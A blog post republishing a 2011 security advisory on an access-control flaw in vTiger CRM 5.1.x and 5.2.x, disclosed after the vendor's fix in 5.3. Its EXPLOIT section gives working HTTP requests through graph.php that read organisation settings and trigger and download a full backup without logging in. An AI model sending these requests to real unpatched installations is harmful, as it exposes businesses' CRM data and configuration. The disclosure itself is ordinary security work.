Posts tagged vulnerability

Hi,

Here a old vulnerability submitted to vTiger Team last summer. As the 5.3 release was released some week ago, I can now publish this advisory.

Advisory: MEDS-2011-01 - VTigerCRM Anonymous access to Setting Module
using graph.php
Release Date: 2011-05-08
Author: Francois Harvey, gestion medsecure (francois.harvey at
medsecure dot ca) - http://medsecure.ca
Application: Vtiger CRM 5.2.x, 5.1.x
Severity: High
Risk: High
Vendor Status: notified fixed in 5.3

OVERVIEW

"vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support."

VULNERABILITY

Some module (Many in Setting, but also Portal) from vtiger CRM don't
verify the user access level and may be called in anonymous mode using
the graph.php script. This vulnerability can be used to view or modify
some configurations setting (organisation name, templates, backup).

EXPLOIT

# Show Organization information

http://x.x.x.x/vtigercrm/graph.php?module=Settings&action=OrganizationConfig&parenttab=Settings

# Launching Backup and get the backup file (if enabled)

1) Start a Backup
POST /vtigercrm/graph.php
server_type=local_backup&module=Settings&action=BackupServerConfig&local_server_mode=&parenttab=Settings&enable_local_backup=on&backupnow=Backup+Now

2) Find the backup name in the output
Backed Up Successfully To File : ./backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip

3) Get the Dumpfile
GET /vtigercrm/backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip

FIX

Upgrade to 5.3.x

AUTHOR
François Harvey - CISM/CISSP/TCSE
Professionnel en sécurité de l'information
Gestion medsecure
medsecure.ca - francoisharvey.ca